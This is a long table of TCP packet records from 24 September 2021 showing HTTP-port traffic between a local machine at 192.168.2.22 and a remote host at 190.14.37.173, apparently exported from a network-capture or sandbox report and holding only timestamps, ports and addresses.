                Sep 24, 2021 17:26:59.655569077 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655606985 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655607939 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655653000 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655654907 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655694962 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655698061 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655735970 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655774117 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655812979 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655819893 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655858994 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.657830000 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.841377974 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841444969 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841461897 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841495037 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841511011 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841526985 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841542959 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.841559887 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.843584061 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.858253956 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858280897 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858293056 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858313084 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858330011 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858345985 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858362913 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858377934 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858392954 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858407974 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858423948 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858443022 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858459949 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858474016 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.858474970 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858491898 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858508110 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.858516932 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.858551025 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.859416962 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.861040115 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.861057043 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.861114025 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.052623987 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052655935 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052668095 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052681923 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052709103 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052741051 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052757025 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052776098 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052794933 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052809954 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052829027 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052849054 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052865028 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052881956 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052896976 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052917004 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052933931 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052949905 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.052964926 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053000927 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053015947 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053035975 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053052902 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053069115 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053086996 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053103924 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053137064 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053165913 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053179026 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053195953 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053200960 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.053215027 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053236961 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053242922 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.053256035 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053273916 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053277969 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.053297043 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053306103 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.053319931 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.053335905 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.053360939 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.053391933 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.266479969 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.266621113 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.266726971 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.266783953 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.266840935 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.266966105 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267023087 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267028093 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267091036 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267174959 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267204046 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267267942 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267309904 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267323971 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267329931 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267384052 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267391920 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267457962 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267460108 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267515898 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267539978 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267580032 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267601967 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267605066 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267661095 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267714977 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267726898 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267729998 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267788887 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267832994 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267847061 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267890930 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267906904 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.267910004 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.267966032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.268008947 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.268027067 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.268033028 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.268088102 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.268126965 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.268146992 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.268155098 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.268212080 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.268218994 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.268291950 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472117901 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472178936 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472215891 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472254038 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472307920 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472363949 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472368002 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472402096 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472408056 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472415924 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472426891 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472466946 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472485065 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472527981 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472589970 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472594976 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472646952 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472650051 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472656965 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472702980 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472721100 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472762108 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472769976 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472826004 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472827911 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472882032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472887039 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472923040 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472944975 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.472961903 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.472975969 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473020077 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473021030 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473057032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473093987 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473078012 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473129988 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473139048 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473146915 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473186970 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473190069 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473236084 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473272085 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473279953 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473292112 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473309040 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473325014 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473347902 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473362923 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473397017 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473407984 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473438025 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473474979 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473462105 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473521948 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473526955 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473534107 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473566055 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473584890 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473602057 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473615885 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473639965 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473661900 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473676920 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473692894 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473728895 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473732948 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473766088 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473788023 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473803043 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.473817110 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.473846912 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.680790901 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680830002 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680847883 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680881023 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680896044 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680911064 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680932045 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680953026 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680973053 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.680999041 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681021929 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681042910 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681063890 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681083918 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681102991 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681123972 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681144953 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681170940 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681193113 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681212902 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681235075 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681256056 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681274891 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681296110 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681315899 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681340933 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681363106 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681382895 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681402922 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681423903 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681442976 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681467056 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681485891 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681510925 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681533098 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681536913 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.681555033 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.681673050 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.888952971 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889022112 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889060974 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889108896 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889153004 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889189959 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889229059 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889223099 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889267921 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889293909 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889301062 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889305115 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889306068 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889326096 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889343977 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889378071 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889381886 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889430046 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889451981 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889461994 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889467955 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889473915 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889513016 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889533043 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889552116 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889566898 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889594078 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889602900 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889631987 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889643908 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889671087 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889672041 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889708042 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889755964 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889758110 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889767885 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889797926 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889806032 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889837980 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889839888 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889877081 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889890909 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889915943 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889923096 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889951944 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.889965057 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.889990091 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890002966 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890028000 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890045881 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890075922 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890077114 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890119076 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890125990 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890156984 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890172958 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890194893 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890211105 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890233994 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890252113 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890270948 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890270948 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890309095 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890321970 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890347958 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890352011 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890394926 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890397072 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890438080 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:00.890444994 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:00.890491009 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.095694065 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095757961 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095796108 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095837116 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095875978 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095923901 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095968008 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096005917 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.095999956 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096045017 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096085072 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096121073 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096159935 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096236944 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096247911 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096252918 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096257925 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096261978 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096266031 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096270084 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096273899 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096277952 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096282959 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096287012 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096380949 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096429110 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096472025 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096476078 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096509933 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096560955 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096568108 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096574068 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096612930 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096648932 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096685886 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096688032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096693993 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096697092 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096725941 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096733093 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096739054 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:27:01.096774101 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:27:01.096791983 CEST4916780192.168.2.22190.14.37.173
